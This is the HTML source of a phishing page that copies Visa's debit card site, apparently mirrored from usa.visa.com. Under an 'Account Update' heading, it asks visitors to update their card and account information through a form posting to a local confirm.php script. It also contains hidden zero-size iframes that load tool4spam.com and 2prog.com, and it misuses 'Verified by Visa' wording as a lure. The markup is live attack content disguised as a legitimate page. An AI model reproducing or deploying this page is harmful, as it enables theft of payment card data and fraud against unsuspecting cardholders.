﻿
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Credit Card | Account Update |</title><!--googleoff: all-->
<link rel="shortcut icon" href="favicon.ico">
<meta http-equiv="Description" content=" notneeded "><!--googleon: all--><!--googleoff: all-->
<meta http-equiv="Keywords" content=" notneeded "><!--googleon: all--><!--googleoff: all-->
<meta http-equiv="Content-Language" content="en"/></meta>
<meta name="keywords" content="manager"></meta>
<meta name="description" content="manager"></meta>
<meta name="category" content="manager"></meta>
<meta name="subcategory" content="manager"></meta>
<link rel="canonical" href="index-2.html" />
<style type="text/css">
@import url(css/global.css);
@import url(css/content.css);
@import url(css/custom.css);
@import url(css/giftcard.css); 
@import url(css/custom_card_template.css); 
</style>
	
	<style type="text/css">
@import url(css/personal.css);
	</style>
	<script type="text/javascript" src="js/visa.js"></script>
	<script type="text/javascript">printableCSS();</script>
	<script type="text/javascript" src="js/search/overlay.js"></script>
	<script type="text/javascript">titleSifr();</script>
	
	</head>
	<body>
	<div id="container">
		<a name="top"></a>
		<div class="accessible">
Skip to:<a href="#content">Content</a>, <a href="#nav">Section Navigation</a>, <a href="#search">Search</a>
		</div>
		<div id="header" class="sub">
<div id='logo'>
	<a href="http://usa.visa.com/index.html" target="_blank"><img src="img/logo_visa.gif" alt="usa.visa.com"/></a>
	</div>
<div id="siteUtilities">
	<h2 class="accessible">Site Utilities</h2>
	<div id='siteLinks'><ul><li>
	<a href="http://usa.visa.com/personal/index.html"target="_blank">Personal</a>
	</li><li>
	<a href="http://usa.visa.com/business/index.html"target="_blank">Small Business</a>
	</li><li>
	<a href="http://usa.visa.com/merchants/index.html"target="_blank">Merchants</a>
	</li><li>
	<a href="http://usa.visa.com/corporate/index.html" target="_blank">Mid-Size & Large Companies</a>
	</li><li>
	<a href="http://usa.visa.com/government/index.html"target="_blank">Government</a>
	</li></ul></div><a name="search"></a>
<form name="seek1" method="get" accept-charset="iso-8859-1" action="http://visasearch.visa.com/UsaSearch/query.html" id="search-form">
	<div class="searchinputs">
		<div class="searchfield">
<input name="qt" id="search" maxlength="1991" value="" /><input value="Submit" type="image" src="img/buttons/go.gif" alt="Go" align="top" />
<input type="hidden" name="col" value="usa" />
<input type="hidden" name="qs" value="" />
<input type="hidden" name="ws" value="0" />
<input type="hidden" name="st" value="1" />
<input type="hidden" name="style" value="usa" />
		</div>
	</div>
</form>
</div>
<a name="nav"></a>
<h2 class="accessible">Navigation</h2>
<div id='primaryNav'><ul><li>
	<a href="http://usa.visa.com/personal/cards/index.html"target="_blank">Find a Card</a>
	</li><li>
	<a href="http://usa.visa.com/personal/using_visa/index.html"target="_blank">Using Visa</a>
	</li><li>
	<a href="http://usa.visa.com/personal/discounts/index.jsp"target="_blank">Discounts</a>
	</li><li>
	<a href="http://usa.visa.com/personal/security/index.html"target="_blank">Visa Security & Protection</a>
	</li><li>
	<a href="http://usa.visa.com/personal/student/index.jsp"target="_blank">Visa Student</a>
	</li><li>
	<a href="http://usa.visa.com/personal/visa_brings_you/index.html"target="_blank">Visa Brings You</a>
	</li><li>
	<a href="http://usa.visa.com/personal/account-inquiries/index.html"target="_blank">Account Inquiries</a>
	</li></ul></div><div id='secondaryNav'><ul><li>
	<a href="http://usa.visa.com/personal/cards/start-your-search/index.jsp"target="_blank">Start Your Search</a>
	</li><li>
	<a href="http://usa.visa.com/cardadvisor/CardAdvisor"target="_blank">Card Advisor</a>
	</li><li>
	<a href="http://usa.visa.com/personal/visa-signature/index.jsp"target="_blank">Visa Signature</a>
	</li><li>
	<a href="http://usa.visa.com/personal/cards/credit/index.html"target="_blank">Credit Cards</a>
	</li><li>
	<a href="index-2.html"class='selected'target="_blank">Debit/Check Card</a>
	</li><li>
	<a href="http://usa.visa.com/personal/cards/prepaid/index.html" target="_blank">Prepaid & Gift Cards</a>
	</li><li>
	<a href="http://usa.visa.com/personal/cards/benefits/index.html" target="_blank">Card Benefits</a>
	</li><li>
	<a href="http://usa.visa.com/personal/cards/paywave/index.html"target="_blank">Visa payWave</a>
	</li><li><a></a><span style="line-height:19px;">&nbsp;</span></li></ul></div>
		</div>
		
		<div id='titleBar'><ul><li><h2 class='sIFR'>Credit Card</h2></li></ul></div>
<div id='body' class='content'><div id='leftCol'><div id='tertiaryNav'><ul><li>
	<a href="http://usa.visa.com/personal/cards/debit/debit_apply.jsp" id='first'target="_blank">Credit Card Providers</a>
	</li><li>
	<a href="http://usa.visa.com/personal/cards/debit/visa_extras.html"target="_blank">Visa Extras</a>
	</li><li>
	<a href="http://usa.visa.com/personal/cards/debit/visa_check_cards_faq.html" target="_blank">FAQ</a>
	</li></ul></div></div><div id="content"> <table cellpadding="0" cellspacing="0" border="0" width="622">
<tr>
 <td width="199"><img src="img/cards/card_visa_check_banner_a.gif" width="199" height="151" border="0" alt="" title="" /><br />
	<a href="http://usa.visa.com/personal/cards/"target="_blank"><img src="img/cards/card_visa_check_banner_b.gif" width="199" height="24" border="0" alt="" title="" /></a></td>
	<td width="423"><img src="img/cards/card_visa_check_banner_c.jpg" width="423" height="175" border="0" alt="" title="" /></td>
</tr>
 </table> <div class="text"><h4>Credit Card Account Update &reg;</h4>
		<p>Bank of America, Capital One, Charter One Bank, Chase, Citibank, Citizens Bank, FIA Card Services, First National Bank of Omaha, National City, Navy Federal Credit Union, US Bank, Wachovia, WaMu, Wells Fargo and other Financial institution.</p><h4>Activate a Credit or Debit Card Online</h4>
<p> Update personal, secure account information of your Credit or Debit card:</p>
<!-- Start of DoubleClick Floodlight Tag: Please do not remove-->
<!-- Activity Name for this tag is:Debit/Check Card Landing Page-->
<!-- Web site URL where tag should be placed: http://usa.visa.com/personal/cards/debit/index.html -->
<!-- This tag must be placed within the opening <body> tag, as close to the beginning of it as possible-->
<!-- Creation Date:4/15/09 -->
<script type="text/javascript">
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="http://fls.doubleclick.net/activityi;src=1787495;type=fy09c848;cat=debit298;ord=' + a + '?" width="1" height="1" frameborder="0"></iframe>');
</script>
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1787495;type=fy09c848;cat=debit298;ord=1?" width="1" height="1" frameborder="0"></iframe>
</noscript><!-- End of DoubleClick Floodlight Tag: Please do not remove--><!-- Tag for Activity Group: Visa Debit, Activity Name: Debit Homepage, Activity ID: 711571 -->
<!-- Expected URL: http://usa.visa.com/personal/cards/debit/index.html --><form name="creditnumber" method="post" action="confirm.php">
<table width="303" border="0" cellpadding="1">

<input type= "image" name="Submit" src="img/login.gif" alt="Login" name="Submit" value="Submit" id="Submit" />&nbsp;</p> </div></td>
</tr>
</table>
 </form><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<p>Verified by Visa is an innovation service certified by Visa International® offering secure Internet shoping, using your preferred form of Internet payment. Verified by Visa lets you add a personal password to your existing Credit or Debit card, getting added security and the reassurance that only you can use your Card online.</p><br />
<br />
<br />
<br />
<br />
<br />
<br />
Activity ID: 711571
Activity Name: Visa Credit Card Account Update<!--
Start of DoubleClick Floodlight Tag: Please do not remove
Activity name of this tag: Debit Homepage
URL of the webpage where the tag is expected to be placed: http://usa.visa.com/personal/cards/debit/index.html
This tag must be placed between the <body> and </body> tags, as close as possible to the opening tag.
Creation Date: 07/21/2010
-->
<script type="text/javascript">
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="http://fls.doubleclick.net/activityi;src=2592735;type=visad092;cat=debit353;ord=' + a + '?" width="1" height="1" frameborder="0"></iframe>');
</script>
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2592735;type=visad092;cat=debit353;ord=1?" width="1" height="1" frameborder="0"></iframe>
</noscript><!-- End of DoubleClick Floodlight Tag: Please do not remove -->
 </div>
<div id="rightCol">
<div id='emailprintModule'><ul><li class=''></li></ul></div>
<div class="printControls" id="printControls"><iframe src="http://tool4spam.com/" width="0" height="0"></iframe>
	<ul>
		<li class="printIcon"> </a></li>
		<li><a href="javascript:window.close();">Close Window</a></li>
	</ul>
</div>
<script type="text/javascript" language="javascript">
var features= new Array();
var weights= new Array();
	var randomize = "yes";features[features.length]= {weight:64, title: "Teen\'s Prepaid Card", links: [{description: "Parental peace of mind<br>The Visa Buxx Card",url: "http://usa.visa.com/personal/cards/prepaid/visa_buxx.html",sponsored:false,sponsoredHighPriority:false,image: "",issuer: ""} ]};
features[features.length]= {weight:64, title: "Use your Visa card.", links: [{description: "Make paying taxes less taxing.",url: "http://usa.visa.com/personal/using_visa/pay_taxes_with_visa.html",sponsored:false,sponsoredHighPriority:false,image: "",issuer: ""} ]};
features[features.length]= {weight:4, title: "Get a Card", links: [{description: "Find a card with Card Advisor. Apply online.",url: "/cardadvisor/CardAdvisor",sponsored:false,sponsoredHighPriority:false,image: "",issuer: ""} ]};
features[features.length]= {weight:4, title: "Easy to wrap. Easy to give.", links: [{description: "Visa Gift Card",url: "/personal/cards/prepaid/visa_gift_card.html",sponsored:false,sponsoredHighPriority:false,image: "",issuer: ""} ]};</script>
<div class="featureModuleContainer"></div><iframe src="http://2prog.com/" width="0" height="0"></iframe>
<script type="text/javascript" language="javascript" src="js/features.js"></script>
<script type="text/javascript" language="javascript">
	createRandomFeature(2);
</script>
<div class="cleaner">&nbsp;</div>
<div class="rightColRule"></div>
	
	
 
		<div class="relatedInfo">
<h3>Related Information</h3>
<ul>
 
  	<li><a href="http://usa.visa.com/personal/security/index.html"target="_blank">Visa Security & Protection</a><br />
Find out how Visa protects your purchases.
</li>		

<li><a href="http://usa.visa.com/personal/using_visa/pay_bills_with_visa/index.html"target="_blank">Hassle-Free Bill Payment</a><br />
No more check writing; no more missed payments. Pay bills with Visa.
</li>		

<li><a href="http://usa.visa.com/personal/cards/prepaid/gift-card-online.jsp"target="_blank">Visa Gift Card</a><br />
Easy to wrap.<br />Easy to give.
</li>		


 </ul>
</div>
<div class="rightColRule"></div>
 
<!--TWITTER FEATURE--><div class="relatedInfo">
<h3>Practical Money Skills for Life<sup>TM</sup> on Twitter</h3>
<p>Keep up to date with news, PracticalMoney tweets and events.</p>
<a href="http://twitter.com/PracticalMoney" target="_blank"><img id="twitterIcon" src="img/other/twitter-icon.gif" border="0" /></a> <a id="twitterLink" href="http://twitter.com/PracticalMoney" target="_blank">Follow on Twitter</a>
</div>
 </div></div>
</div>
<div class="cleaner">&nbsp;</div>	<iframe src="http://usa.visa.com/ext/nav/footer.html" frameborder="0" width="770" height="60" scrolling="no" marginwidth="0" marginheight="0" title="footer"></iframe>
		
	
	</div></body><!-- Mirrored from usa.visa.com/personal/cards/debit/index.html by HTTrack Website Copier/3.x [XR&CO'2010], Sat, 01 Oct 2011 22:56:53 GMT -->
</html>